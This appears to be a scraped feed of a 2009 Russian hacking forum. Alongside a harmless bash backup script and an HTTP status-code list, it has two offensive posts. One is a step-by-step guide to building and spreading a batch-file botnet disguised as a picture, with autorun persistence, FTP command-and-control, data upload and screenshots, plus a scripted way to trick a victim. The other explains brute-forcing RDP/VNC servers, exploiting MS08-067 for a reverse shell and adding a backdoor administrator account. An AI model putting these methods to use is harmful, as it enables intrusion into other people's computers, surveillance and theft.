мы будем делать и ARCHIVEDIR для папки, куды мы поместим архив. Самой главной частью скрипта будут команды поиска и архивации всех найденных файлов и папок в указанной:</p> <p>find . -type f -print0 | xargs -0 tar rvf &quot;$archive.tar&quot; &gt; /dev/null<br />gzip $archive.tar</p> <p>Давайте разберемся, что же эти команды делают. find ищет в текущем каталоге (об этом говорит первый аргумент &quot;.&quot;) все файлы и выдает полный путь к ним (print0). Эти пути перенаправляюся команде tar, которая собирает все файлы в один. Затем командой gzip мы архивируем получившийся tar-файл. Команда &gt; /dev/null удобна, если вы архивируете большое количество файлов. В этом случае их имена и полный путь к ним не выводятся на консоль. </p> <p>Следующий шаг должен предусмотреть подсказки пользователю как пользоваться скриптом, если он допустит какие-то ошибки.</p> <p>Например, эта конструкция </p> <p>if [ $# -lt &quot;$MAXPARAMS&quot; ];<br />then<br />echo<br />echo &quot;Использование: sh `basename $0` имя_архива папка-источник папка-назначение&quot;<br />echo<br />exit 0<br />fi</p> <p>подскажет, что пользователь указал недостаточное количество аргументов командной строки. If [условие]...fi задает условную конструкцию. $# -lt &quot;$MAXPARAMS&quot; проверяет введенное количество параметров и если это число окажется меньше MAXPARAMS, то пользователю будет выдано сообщение об ошибочном вводе. Exit 0 заставит скрипт прекратить работу без указания кода ошибки. Аналогично проверяется превышение допустимого числа параметров, только вместо ls (less then – меньше, чем), необходимо указать gt (greater then – больше, чем). Теперь, когда основные моменты скрипта разъяснены, можно переходить к полной его версии:</p> <p>#!/bin/bash<br /># Описание:<br />#+ Делает резервную копию всех файлов в указанной директории<br />#+ в &quot;tarball&quot; (архив tar.gz).<br />#+ Использование:<br />#+ sh backup.sh имя_архива папка-источник папка-назначение<br />#+ Автор:<br />#+ Александр &quot;Voland&quot; Теленьга</p> <p># Максимальное количество параметров командной строки<br />MAXPARAMS=3</p> <p>if [ $# -lt &quot;$MAXPARAMS&quot; ];<br />then<br />echo<br />echo &quot;Использование: sh `basename $0` имя_архива папка-источник папка-назначение&quot;<br />echo<br />exit 0<br />fi</p> <p>if [ $# -gt &quot;$MAXPARAMS&quot; ];<br />then<br />echo<br />echo &quot;Для этого скрипта нужно только $MAXPARAMS аргументов командной строки!&quot;<br />echo<br />exit 0<br />fi</p> <p># Переменные, которые мы используем в скрипте<br />BACKUPFILE=$1-backup-$(date +%m-%d-%Y)<br />archive=$BACKUPFILE<br />BACKUPDIR=$2<br />ARCHIVEDIR=$3</p> <p># Проверяем, есть ли папка-источник и папка-назначение<br />if [ ! -e $BACKUPDIR ];<br />then<br />echo<br />echo &quot;&quot;$BACKUPDIR&quot; не существует!&quot;<br />echo<br />exit 0<br />fi</p> <p>if [ ! -e $ARCHIVEDIR ];<br />then<br />echo<br />echo &quot;&quot;$ARCHIVEDIR&quot; не существует, создаем...&quot;<br />mkdir $ARCHIVEDIR<br />echo &quot;Готово.&quot;<br />fi</p> <p># Проверяем, есть ли архивы в источнике и назначении.<br />cd $ARCHIVEDIR<br />if [ -e $archive.tar.gz ];<br />then rm $archive.tar.gz<br />fi</p> <p>cd $BACKUPDIR<br />if [ -e $archive.tar.gz ];<br />then rm $archive.tar.gz<br />fi</p> <p># Главная часть скрипта...<br />echo &quot;Делаем резервную копию &quot;$BACKUPDIR&quot; в файл &quot;$archive.tar.gz&quot;...&quot;<br />find . -type f -print0 | xargs -0 tar rvf &quot;$archive.tar&quot; &gt; /dev/null<br />gzip $archive.tar<br />echo &quot;&quot;$BACKUPDIR&quot; была успешно заархивирована в файл &quot;$archive.tar.gz&quot;.&quot;</p> <p># Перемещаем архив в папку ARCHIVEDIR<br />echo &quot;Перемещаем архив &quot;$archive.tar.gz&quot; в папку &quot;$ARCHIVEDIR&quot;.&quot;<br />mv $archive.tar.gz $ARCHIVEDIR/$archive.tar.gz<br />echo &quot;Готово.&quot;</p> <p>exit 0</p> <p>Надеюсь, основные моменты я прокомментировал достаточно подробно.</p> mybb@mybb.ru (admin) Tue, 10 Feb 2009 17:56:21 +0300 http://sliphot.bbon.ru/viewtopic.php?pid=158#p158 http://sliphot.bbon.ru/viewtopic.php?pid=157#p157 <p>22.05.2007</p> <p>При запросе какого либо документа сервер выдает служебную информацию, которую просто необходимо анализировать для дальнейшей работы. Самой первой строкой сервер возвращает так называемый код ответа, являющийся числом в диапазоне 100-599 и определяющий результат запроса. Эти коды распределены по следующим группам:</p> <p>100-199 :: Информационный код.<br />200-299 :: Успешный запрос клиента.<br />300-399 :: Переадресация запроса клиента.<br />400-499 :: Ошибочный запрос.<br />500-599 :: Ошибка сервера.<br /><br /> </p> <p>Информационный Ответ. Коды 100-199.<br />Указывает на то, что идет обработка запроса клиента.</p> <p>100 Continue. Возможно продолжение запроса клиента.</p> <p>101 Switching Protocols. Сервер использует запрос клиента для переключения протоколов.<br /><br /> </p> <p>Успешный Запрос Клиента. Коды 200-299.<br />Запрос клиента успешен, возможно продолжение работы.</p> <p>200 ОК. Запрос успешен, сервер возвращает запрошенный документ.</p> <p>201 Created. Сервер создает новый ресурс. Обычно является результатом запроса PUT.</p> <p>202 Accepted.&#160; Запрос клиента принят.</p> <p>203 Non-Authoritative Information.&#160; Информация в заголовке объекта предоставлена не сервером.</p> <p>204 No Content.Запрос успешен, но в ответе отсутствует контент.</p> <p>205 Reset Content.Программа просмотра должна очистить форму, используемую для этой транзакции для дополнительного ввода.</p> <p>206 Partial Content.Сервер не может возвратить всю запрошенную информацию.<br /><br /> </p> <p>Переадресация Запроса Клиента. Коды 300-399.<br />Запрос не был выполнен, необходимо обратиться к другому ресурсу для его выполнения.</p> <p>300 Multiple Choices.&#160; Требуемый URL обращается больше чем к одному ресурсу (документ на множественных языках).</p> <p>301 Moved Permanently.&#160; Требуемый URL не правилен для этого сервера, и произошла ошибка. Сервер также посылает заголовок местоположения, где ресурс теперь расположен и где клиент должен указать его в будущем.</p> <p>302 Moved Temporarily.&#160; Требуемый URL не правилен для сервера, и произошла ошибка. Сервер также посылает заголовок местоположения, где временно расположен ресурс и сообщение, что сервер должен использовать это местоположение только для этого запроса.</p> <p>303 See Other.&#160; Требуемый URL может быть найден в отличном URL (указанным в заголовке Location) и должен быть запрошен методом GET на том ресурсе.</p> <p>304 Not Modified.&#160; &#160;Этот код возвращается сервером на запрос &quot;If-Modified-Since&quot; в том случае, если запрошенный документ не изменился. Тогда программа просмотра использует его кэшированную копию.</p> <p>305 Use Proxy.&#160; Требуемый URL должен пройти указанный прокси.<br /><br /> </p> <p>Ошибочный Запрос Клиента. Коды 400-499.<br />Запрос клиента не может выполниться, так как содержит ошибки.</p> <p>400 Bad Request.&#160; В запросе клиента обнаружена синтаксическая ошибка.</p> <p>401 Unauthorized.&#160; Для доступа к запрошенному URL необходима авторизация, а в запросе отсутствует опознавательная информация.</p> <p>402 Payment Required.&#160; &#160;не используется.</p> <p>403 Forbidden.&#160; &#160;Доступ к запрошенному ресурсу запрещен.</p> <p>404 Not Found.&#160; &#160;Запрошенный документ не существует.</p> <p>405 Method Not Allowed.&#160; &#160;Метод запроса не поддерживается запрошенным URL. </p> <p>406 Not Acceptable.&#160; &#160;Ресурс, запрошенный клиентом, существует, но не в требуемом формате. Это может быть заданный язык или тип содержания.</p> <p>407 Proxy Authentication Required.&#160; Прокси-сервер должен разрешить запрос перед его выполнением.</p> <p>408 Request Time-out.&#160; Соединение будет разорвано сервером.</p> <p>409 Conflict.&#160; Запрос находится в противоречии с другим запросом или с конфигурацией сервера.</p> <p>410 Gone.&#160; &#160;Этот код указывает, что требуемый URL больше не существует и&#160; удален с сервера.</p> <p>411 Length Required.&#160; &#160;Для выполнения запроса необходимо указать параметр Content-Length.</p> <p>412 Precondition Failed.&#160; &#160;Предварительное условие не выполняется.</p> <p>413 Request Entity Too Large.&#160; &#160;Сервер не может обработать запрос, потому что тело его объекта слишком велико.</p> <p>414 Request-URL Too Long.&#160; &#160;Сервер не может обработать запрос, потому что запрошенный URL слишком длинный.</p> <p>415 Unsupported Media Type.&#160; Сервер не может обработать запрос, потому что формат тела его объекта не поддерживается.<br /><br /> </p> <p>Ошибка Сервера. Коды 500-599.<br />Запрос клиента вызвал ошибку на сервера.</p> <p>500 Internal Server Error.&#160; Запрос вызвал внутреннюю ошибку сервера.</p> <p>501 Not Implemented.&#160; &#160;Запрошенное клиентом действие не может быть выполнено сервером.</p> <p>502 Bad Gateway.&#160; &#160;Сервер получил недопустимый ответ от другого сервера.</p> <p>503 Service Unavailable.&#160; &#160;Запрошенная служба в данный момент недоступна.</p> <p>504 Gateway Time-out.&#160; Разорвана связь со шлюзом или прокси-сервером.</p> <p>505 HTTP Version not supported.&#160; &#160;Сервер не поддерживает версию HTTP протокола, используемого в запросе.</p> mybb@mybb.ru (admin) Tue, 10 Feb 2009 17:44:03 +0300 http://sliphot.bbon.ru/viewtopic.php?pid=157#p157 http://sliphot.bbon.ru/viewtopic.php?pid=156#p156 <p>03.12.2008</p> <p>Итак, что же такое Ботнет... <br />Вот так вот написано в Викпедии: Ботнет<br />А по простому говоря боты на то и боты, чтобы быть немного автономными и делать то, что им говорят.</p> <p>А мы сделаем своего бота. <br />И нам не нужно чего-то там писать на Си или Асме, нет, ну его... - напишем на языке bat-файлов!</p> <p>Итак представляемый бот обладает следующими преимуществами:<br />-----------------------------------------------------------------------------------------------<br />1. - Он является универсальным.<br />&#160; &#160; &#160; &#160;С его помощью на компьютер можно загрузить любой файл(лишь бы подключение позволяло) и запустить.<br />&#160; &#160; &#160; &#160;К примеру можно загрузить другую программу, другой командный файл (даже трояны, короче все, что&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;угодно).<br />2. - Бот является невидимым (не показывает своих консольных окон), несмотря на то, что это все-же&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; командный файл.<br />3. - Бот не открывает постоянный порт на компьютере(хотя для этого можно загрузить нужный модуль).<br />4. - Бот &quot;выходит в сеть&quot; раз в 5 минут и не перегружает этим траффик.<br />5. - Задания для бота могу быть всего несколько килобайт, <br />что оправдывает его использования при слабых каналах.<br />6. - Если бот находится во внутренней сети и\или выходит в интернет через другой компьютер, <br />таким образом не имя своего айпи, то ему все равно можно отдать команду и он пришлет ответ.<br />7. - Комманду можно послать как одному боту так и всем, <br />так и всем кроме определенных, так и только определенным ботам.</p> <p>Итак, как Вы уже узнали, есть боты, ими управляют злые их хозяева)).<br />Но бот как-то должен попасть на заражаемый компьютер.<br />Можно к примеру склеить его джойнером с картинкой и дать жертве.</p> <p>Сам бот(или как я его назвал Joker, далее Джокером и буду звать) почти готовый.<br />Имя ему Joker.scr - это самораспаковывающийся архив под видом каринки. <br />Его мы и подготовим.</p> <p>После запуска Joker.scr из него извлекаются два главных файла: Joker.bat и JokerLoader.js<br />Первый это и есть настоящий Джокер, а второй это его загрузчик(написан на jscript).</p> <p>Нужен загрузчик, чтобы запускать переданные ему в коммандной строке файлы либо в видимом <br />либо в скрытом режиме. Синтаксис таков: jokerloader.js first second third<br />Где first может быть либо -runshow либо -runhide либо -autorun.<br />Первый случай означает запускать все, что передано в следующих параметрах в режиме&#160; &#160;видимости<br />Второй случай означает запускать все, что передано в следующих параметрах в режиме НЕвидимости<br />Третий же означает, что нужно добавится в автозапуск, так как это первый запуск на данном компьютере.<br />Так же в этом случае последующие параметры игнорируются и роли не играют<br />(обычно их просто нет, если Вы не напишите).</p> <p>Итак после запуска Joker.exe в директорий %userprofile%\Joker извлекаются jokerloader.js и joker.bat.<br />Затем запускается &quot;jokerloader.js - autorun&quot; который добавляет в автозапуск себя,<br />точнее в ключ HKCU\Software\Microsoft\Windows\CurentVersion\Run<br />После этого он запускает &quot;joker.bat -autorun&quot; <br />(разумеется в скрытом режиме, далее это тоже будет подразумеватся) <br />Joker.bat обнаружив параметр -autorun считает, что это его первый запуск и создает файл digit.dat<br />в который он записывает случайное число.<br />Далее это число будет являтся уникальным идентификатором этого бота!<br />После этого Джокер (будет подразумеватся Joker.bat) запускает свою копию через загрузчик, <br />а сам завершается.<br />Запущенный собой джокер смотрит, что он без параметра -autorun и соединяется с фтп сервером, <br />куда он отправляет файл %digit%.ans, где вместо %digit% стоит число - уникальный идентификатор бота <br />(далее под %digit% это всегда будет подразумеватся это число)<br />В файле содержится информация о времени, дате, имени компьютера, имени пользователя, <br />и подключениях (в том числе айпи адресса).<br />Далее бот скачивает задание, а именно файл mastertask.bat, затем он запускает задание и ждет 5 минут, <br />потом снова лезет на фтп сервер и так пока компьютер не выключится. <br />А когда включится, то опять будет лезть)))<br />А задание, которое является полностью автономным после запуска, <br />уже само забоится о задачах и отсылает отчет о выполнении.</p> <p>Итак подготовка бота к впариванию)):</p> <p>Нужно подготовить фтп аккаунт. Идем к примеру на <a href="http://www.drivehq.com/ftp/" rel="nofollow" target="_blank">http://www.drivehq.com/ftp/</a> (или любой другой хостинг, можно и бесплатный, но с поддержкой загрузки файлов по ftp) и регаемся на халяву.</p> <p>Внимание: не всякий хостинг подходит! (К примеру phpnet.us НЕ подходит). Узнать какой подходит, а какой нет можно по &quot;диагностическим&quot; сообщениям во время отправки\получения файлов или пробным путем.</p> <p>Нам нужны будут имя и пароль на фтп аккаунт.<br />Заходим в свой фтп аккаунт и создаем папочку htdocs (если ее нет) а в ней папки upload и download</p> <p>Скачиваем бота<br />Извлекаем куда-то все это.<br />Отрываем блокнотом файл Joker.bat(правой - изменить) - правка - заменить: <br />ftppass на ваш пароль и ftpuser на ваше имя пользователя<br />А так же ftphost на имя вашего фтп (для <a href="http://phpnet.us" rel="nofollow" target="_blank">http://phpnet.us</a> это ftpphpnet.us)<br />Жмем на кнопочку &quot;Заменить все&quot;&#160; - если все ОК сохраняемся.<br />При необходимости заменяем файл picture.jpg на свой сохранив имя.<br />Выделяем все наши файлы кроме файла pic.ico и создаем такой архив:<br />Самораспаковывающийся архив. Метод сжатия маскимальный. <br />Параметры sfx - загрузить значок: выбираем наш pic.ico<br />ОК, теперь жмем на нашем архиве точка ехе правой - открыть в винрар.<br />Жмем комментарий и вписываем такое:</p> <p>Path=%userprofile%\Joker<br />SavePath<br />Setup=&quot;%userprofile%\Joker\JokerLoader.js&quot; -autorun<br />Setup=&quot;%userprofile%\Joker\picture.jpg&quot;<br />Silent=1<br />Overwrite=1</p> <p>ВНИМАНИЕ: если Вы не положили в архив картинку, то строчку Setup=&quot;%userprofile%\Joker\picture.jpg&quot; не нужно писать!</p> <p>ОК, меняем рассширение с exe на scr (а можно оставить exe) и бот готов(точнее это же у нас мм... картинка ;-) ).</p> <p>Значит с Джокером разобрались немного.</p> <p>Для управления ботами ведь тоже что-то надо, &quot;руками&quot; это затруднительно, хотя для любителей...)))<br />Итак, то, чем мы будем отдавать команды ботам есть бот-мастер.</p> <p>Подробно коммандый файл bot-master'а разбирать не буду, так как там довольно таки не мало написано <br />и лучьше я раскажу самые главный моменты,а тот, кто знает язык коммандых файлов, <br />тот разбереться (а кто не знает, вот ссылка на книжку)<br />К тому же мне можно персонально задать по этому вопросы в комментариях или на форуме HackZone</p> <p>Скачиваем мастер<br />Извлекаем файлы в директорию, где наш бот-мастер будет рассполагатся.<br />Запускать нужно master.bat т.к. он главный. Можно даже ярлык сделать для удобства))<br />Правой - изменить на master.bat - правка - заменить: <br />ftppass на ваш пароль и ftpuser на ваше имя пользователя<br />А так же ftphost на имя вашего фтп (для <a href="http://phpnet.us" rel="nofollow" target="_blank">http://phpnet.us</a> это ftpphpnet.us)<br />Жмем на кнопочку &quot;Заменить все&quot;&#160; - если все ОК сохраняемся.<br />Теперь если бот впарен, а мастер есть можно приступать к тому чего так долго ожидалось - управлению! <br />А чтобы было легче разберем менюшки бот-мастера <br />(хоть это и коммандный файл, но все таки свои менюшки есть)... попутно буду переводить.</p> <p>Главное меню.</p> <p>Вы можете:<br />---------------<br />1.&#160; - Просмотреть онлайн статус ботов.<br />2.&#160; - Просмтореть результаты выполнения задания.<br />3.&#160; - Скоммандовать ботам.<br />4.&#160; - Совершить операции с файловой системой.<br />5.&#160; - Запустить\Завершить процессы или просмотреть их список.<br />6.&#160; - Получить информацию о системе.<br />7.&#160; - Посмтореть, что пользователь делает.<br />8.&#160; - Послать маленькие шутки :-)<br />9.&#160; - Выключить-Перезагрузить выйти из системы (разумеется у бота).<br />10.- Послать уже сделанное задание. (задание сделанное предыдущий раз можно послать еще раз <br />или же сдесь отсылается задание, сдекланное только что)<br />11.- Начать проект сначала (предыдущее сделанное задание удалится, как текущее так и сделанное до)</p> <p>(1) - Просмотреть онлайн статус ботов<br />-----------------------------------------------------<br />(1) - Проверить только последний онлайн статус.<br />Просто получаем все файлы *.dat и смотрим на число в них, затем число сравниваем с нашим.<br />Если разница не превышает 6 минут, то пишем, что статус данного бота &quot;онлайн&quot;. <br />В противном случае оффлайн. <br />Здесь кроется небольшое НО: если у бота время не совпадает с нашим, то показания будут неправильными.<br />(2) - Послать запрос и ждать ответа.<br />В отличие от предыдущего способа этот дает почти 100% уверенность, что боты онлайн.<br />С сервера удаляются все файлы *.dat, а затем ждется 6 минут и получаем все файлы *.dat<br />И все боты файлы которых получены есть онлайн!<br />(3) - Ждать, пока не получим ответ.<br />Способ идентичный предыдущему, только ждем мы все время пока не получим отчет о задании.<br />Опрашивание сервера на предмет появления файлов идет периодически с интервалом 2 минуты.</p> <p>(2) - Просмтореть результаты выполнения задания<br />------------------------------------------------------------------------<br />(1) - Проверить результаты один раз.<br />Здесь запрашиваются все файлы *.ans, а затем проверяется номер задания в них<br />(который генерируется случайным образом при создании задания)<br />и если он совпадает с тем, что записан у нас в файле last.task, <br />то это наше задание и мы выводим статистику и запрашиваем вывод самих файлов.<br />Если же номера не совпадают, <br />то делаем вывод, что это задание мы когда-то отсылали, но это не наше последнее.<br />(2) - Ждать получения результатов.<br />То же, но будем ждать бесконечно, периодически опрашивая фтп сервер раз в 2 минуты.</p> <p>(3) - Скоммандовать ботам<br />-------------------------------------<br />(1) - Вставить ручную команду.<br />Пишем комманду, она будет выполнена в контексте cmd.exe, <br />а вывод автоматически запишется в файл отчета<br />(2) - Вставить паузу.<br />Всавить паузу перед выполнением следующего пункта в сценарий задания<br />(3) - Вставить Коммандный пакет.<br />Вставляется коммандный пакет, созданный прежде, <br />он должен лежать в папке packets (как и все небольшие прилагающиеся файлы)</p> <p>В этом и предыдущем случаях если выбирать спрятать комманду, то никаких консольных окон не будет видно,<br />а вывод комманды или коммандного файла запишется в файл ответа.<br />В этом случае скрытия применимо к коммандному файлу желательно вставить комманду паузы<br />после того как вставили коммандный файл, <br />так как главный сценарий задания mastertask.bat не ждет завершения нашего коммандного файла <br />и могут бытьпроблемы. <br />Выводы в файл ответа могут перемешатся с выводами остальных комманд главного сценария.<br />Или, что более вероятно ответ отошлется до того как <br />выбранный нами командный файл завершит вывод в файл отчета.<br />Короче будут проблемы, поэтому после того как добавили командный файл<br />добавьте команду паузы на столько секунд, сколько вы считаете командный файл будет выполнятся<br />(лучше переборщить с запасом, чем недобрать)</p> <p>Если же вы выбрали показывать команду, <br />то окно покажется, а вывод в файл отчета не будет записываться.<br />В случае с командным файлом тоже вывод не будет в файл писаться и вставлять паузу не нужно.</p> <p>Если же Вы хотите, чтобы созданный Вами коммандный файл запускался скрытно<br />и&#160; вывод не перенаправлялся в файл отчета, <br />то добавьте ручную комманду: JokerLoader.js -runhide .\tasks\&quot;имя вашего файла.bat&quot;<br />и перед отправкой задания добавьте в папку tasks ваш файл.<br />В этом случае так же в Вашем коммандном файле нужно Вам написать инструкции отправки ответов,<br />так как главное задание ждать не будет!</p> <p>(4) - Совершить операции с файловой системой<br />-------------------------------------------------------------------<br />(1) - просмтореть дерево файлов.<br />Указываете Путь к папке или диск (С:) <br />и получите все дерево дочерних папок и файлов в них.<br />(2) - Просмтореть просто содержимое папки - Аналогично можно указать С:<br />(3) - Закачать файлы.<br />Файлы бот загружает файлы с компа в папку с именем upload на фтп сервере<br />(корневой папкой для бота есть папка Joker на сервере).<br />(4) - Скачать файлы.<br />Файлы бот скачивает с папки download с фтп сервера и сохраняет их в папку download у себя<br />(5) - Удалить файлы.<br />Удаляет файлы на компе. <br />Можно например задать маску: C:\Temp\*.txt</p> <p>(5) - Запустить\Завершить процессы или просмотреть их список - Выводится список процессов<br />--------------------------------------------------------------------------------------------------------------------------------------<br />(1) - Просмтореть список<br />(2) - Запустить процесс скрытно.<br />Запускается загрузчиком Джокера процесс скрытно, вывод идет в файл отчета.<br />Главное задание НЕ ждет завершения процесса!<br />(3) - Запустить процесс видимым.<br />Запускается загрузчиком Джокера процесс видимо, вывод НЕ идет в файл отчета.<br />(4) - Завершить процесс.<br />Процесс завершается принудительно. <br />Если неудалось то в файл отчета запишется ошибка.</p> <p>(6) - Получить информацию о системе<br />------------------------------------------------------<br />(1) - Полную системную информацию.Информация с помощью systeminfo пишется в файл отчета.<br />(2) - Имена пользователей - Имена всех пользователей системы.<br />(3) - Статистика соединений - Запрашивается статистика текущих соединений<br />(4) - Глобальные переменные - Вывод значений всех глобальных переменных среды.<br />(5) - IP конфигурация - Вывод конфинурации подключений<br />(6) - Установленные программы - ВЫводится список файлов в директории ярлыков всех программ</p> <p>(7) - Посмотореть, что пользователь делает<br />-------------------------------------------------------------<br />Принт скрин экрана с заданной периодичностью и количеством скринов.<br />Используется capturemation.<br />Имена файлов имеют формат: время_дата_имя компа_имя юзера_(active, full или title)_нумерация.bmp<br />Файлы сжимаются и отправляются на сервер в главную папку(Joker).<br />Архивы имеют формат имени: screens_уникальный идентификатор_(active, full или title).arj<br />(1) - Полный принт скрин - это принт скрин всего экрана, он же full<br />(2) - Принт скрин окна с указанным заглавием(title).<br />Заглавие должно точно совпадать с тем что видно на экране!<br />(3) - Принт скрин активного в данный момент окна - Он же active</p> <p>(8) - Послать маленькие шутки<br />------------------------------------------<br />(1) - Простое сообщение &quot;привет&quot; - Вылетает 10 окон с текстом, который указывается<br />(2) - Показать окно &quot;Форматирование диска А:&quot;<br />(3) - Перейти на указанную страницу - Загружает в браузере страничку</p> <p>Послать маленькие шутки --) (4)Показать &quot;цыфровой скринсейвер&quot;<br />На черном экране бегут цыферки, до поры до времени, <br />впрочем это даже не скринсейвер, короче смотрите сами.</p> <p>(9) - Выключить-Перезагрузить выйти из системы (разумеется у бота)<br />---------------------------------------------------------------------------------------------------<br />(1) - Перезагрузить<br />(2) - Выключить<br />(3) - Выйти из системы</p> <p>(10) - Послать уже сделанное задание - Отсылается задание сделааное предыдущий раз или только что<br />------------------------------------------------------------------------------------------------------------------------------------------<br />(1) - Послать всем ботам<br />(2) - Послать всем кроме... - Боты номера которых указаны задание делать не будут<br />(3) - Послать только выбранным - Только боты номера которых указаны будут делать задание</p> <p>(11) - Начать проект сначала<br />-----------------------------------------<br />Аналогично тому, что вы закроете мастер, а потом откроете его</p> <p>Следует заметить, что когда вы это выбираете или запускаете мастер предыдущее задание сохраняется.<br />Если Вы выберети в меню любой пункт, кроме 1, 2, 10 то задание очистится и начнется создание нового.<br />Внимание: нужно внимательно все читать! <br />Непосредственно перед отправкой задания файлы заданий сжимаются архиватором arj (если они есть),<br />после этого делается задержка в 5 секунд, чтобы вы успели прочитать успешно ли выполнено сжатие.<br />Если нет, то вы должны не отправлять и снова попробовать переделать задание!<br />(Вероятность ошибки очень мала, но это на всякий случай).</p> <p>По поводу задания: между <br />rem /////////////////////////////////////////////////////////////////////////////<br />rem ------------------------------Start of your instructions---------------------</p> <p>rem -------------------------------End of your instructions----------------------<br />rem /////////////////////////////////////////////////////////////////////////////</p> <p>можно вписывать свои инструкции если вы выбрали отослать задание но еще не выбрали кому именно,<br />то именно на этой стадии и можно его отредактировать(mastertask.bat - файл задания) <br />при необходимости добавляя к каждой своей команде вывод в файл таким образом: &gt;&gt;%digit%.ans</p> <p>Итак бот-мастера тоже разобрали.</p> <p>Теперь более конкретный пример использования:</p> <p>- hacker: Привет.<br />- lamer : Привет.<br />- hacker: Зацени новую фотку (дает picture.scr)<br />- lamer : Давай... О прикольно: &quot;карта эмоций Сигала&quot;<br />- hacker: Да мне тоже понравилось.</p> <p>Теперь hacker запускает master.bat - пункт 1 - 1 и смотрит... ага бот онлайн... такой-то айпи.<br />Посылает задание получить информацию о системе: 6 - 1 - 7 - 10 - 1 - 1<br />бот-мастер ждет пока результат не появится...</p> <p>Или же делает так: 6 - 1 - 7 - 10 - 1 закрывает бот-мастера,<br />ждет сам несколько минут а затем запускает бот-мастера: 2 - 1<br />Опля есть.</p> <p>Теперь думаю понятно, что даже не нужно обладать познаниями в программирование на C или Assembler'е <br />чтобы сделать свой мини-ботнет))<br />Хех, страшно жить в онлайне да и только :-) ...<br />Как защитится от такой напасти?<br />А не нужно брать что попало на свой комп, да и какое нафиг может быть scr рассширение у картинки.<br />К тому же нужно иметь фаерволл на компьютере, бот вообще не умеет обходить никаких фаерволлов.</p> <p>Обьяснения: статья писалась исключительно в образовательных целях и для указания бреши в системе защиты, и за все возможные последствия после прочтения этой статьи в том числе и после использования прикрепленных файлов (они выкладываются для ознакомления) я ответственности не несу.</p> <p>З,Ы: Принимаются замечания, указания на ошибки и предложения.</p> mybb@mybb.ru (admin) Tue, 10 Feb 2009 17:17:05 +0300 http://sliphot.bbon.ru/viewtopic.php?pid=156#p156 http://sliphot.bbon.ru/viewtopic.php?pid=155#p155 <p>12.01.2009</p> <p>Доброго времени суток!</p> <p>И так преступим, дедик он же dedicated server это выделенный сервер(подробнее смотрим на <a href="http://ru.wikipedia.org" rel="nofollow" target="_blank">http://ru.wikipedia.org</a>). Рассматривать мы будем брут. Следовательно мы будем искать открытые порты 445,139,3389,5900. На машинах с этими открытыми портами можно&#160; получить доступ к удаленному рабочему столу.</p> <p>Начнем пожалуй с порта 5900 он же VNC. Цель для взлома как и все последующие&#160; мы будем искать с помощью сканера Angry IP scanner. Его интерфейс интуитивно понятен (вводим начальный и конечный IP для сканирования, и нажав на стрелочку возле кнопки Start выбираем нужный порт(нажимаем на кнопку рядом с Scan Ports и вводим порт)). Далее нажимаем старт и ждем когда сканер найдет и выдаст нам IP потенциальных жертв. Для удобства в настройках можно указать, чтобы отображались только IP которые онлайн и у них открыт нужный нам порт. Далее берем программу services.exe неизвестного мне автора. С помощью неё мы будем пытаться взломать дедики в каталоге с программой есть такие файлы как:</p> <p>bad.txt - деды к которым пасс не подошел</p> <p>good.txt - деды к которым пасс подошел</p> <p>list.txt - ip дедиков которые мы пытаемся взломать</p> <p>pass.txt - пассворд лист</p> <p>option.ini - файл с настройками программы<br />GENERAL]<br />UIN=icq uin бота<br />PASS=пароль от номера бота<br />PassFile=pass.txt - файл с пассами.<br />UinSend= icq uin на который автоматом высылать гуды.<br />ListFile=list.txt - файл с ip адресами.<br />В самой программе нужно нажать только на кнопочку Start. Ну вобщем-то все, далее сами разберетесь.</p> <p>Взлом дедиков с открытым 139,3389 портом аналогичен. Только софт другой. В качестве брута мы будем использовать Ntscan. В нем практически все также.<br />NT_user.dic - файл с логинами для брута.<br />NT_pass.dic - файл с паролями для брута.<br />host.txt - файл с IP дедиков для брута (надо создать вручную и выбрать при указании параметров брута)<br />В самой программе указываем нужный нам диапазон IP (если предварительно не отобрали дедики для брута), порт,количество потоков, тайм аут...Ну и вроде как все, нажимаем Start и радуемся...</p> <p>И так теперь взлом компьютеров с открытым 445 портом. Находим мы их как и все остальные с помощью сканера портов. Использовать мы будем уязвимость MS08-067_netapi присутствующую Sp SP2SP3 Pro. с помощью Metasploit 3.2. <br />Заходим Metasploit 3.2&gt;GUI&gt;Exploits&gt;Windows&gt;SMB&gt;MS08-067_netapi (подробно о использовании Metasploit можно почитать в статьях -=Lebed=-), Payloads =generic/shell_reverse_tcp</p> <p>Мы получаем консоль жертвы, с помощью FTP закачиваем настроенный RAdmin и потом через консоль радмина</p> <p>cmd<br />net user user pass /add<br />net localgroup Administrators user /add<br />net localgroup &quot;Remote Desktop Users&quot; user /add<br />net accounts /maxpwage:unlimited<br />exit</p> <p>создаем нового пользователя...</p> <p>Ну вот у нас и есть дедик...</p> <p>Файлы к архиву: <a href="http://www.webfile.ws/d/7875" rel="nofollow" target="_blank">http://www.webfile.ws/d/7875</a><br />Пароль:hackzone.ru</p> mybb@mybb.ru (admin) Tue, 10 Feb 2009 17:05:55 +0300 http://sliphot.bbon.ru/viewtopic.php?pid=155#p155 http://sliphot.bbon.ru/viewtopic.php?pid=153#p153 <p>Внимание!!!Пишите здесь о всех возникших наполадках на форуме!</p> mybb@mybb.ru (admin) Tue, 10 Feb 2009 16:55:07 +0300 http://sliphot.bbon.ru/viewtopic.php?pid=153#p153 http://sliphot.bbon.ru/viewtopic.php?pid=152#p152 <p>Здравствуйте уважаемые посетители и пользователи нашего форума!</p> mybb@mybb.ru (admin) Tue, 10 Feb 2009 16:51:20 +0300 http://sliphot.bbon.ru/viewtopic.php?pid=152#p152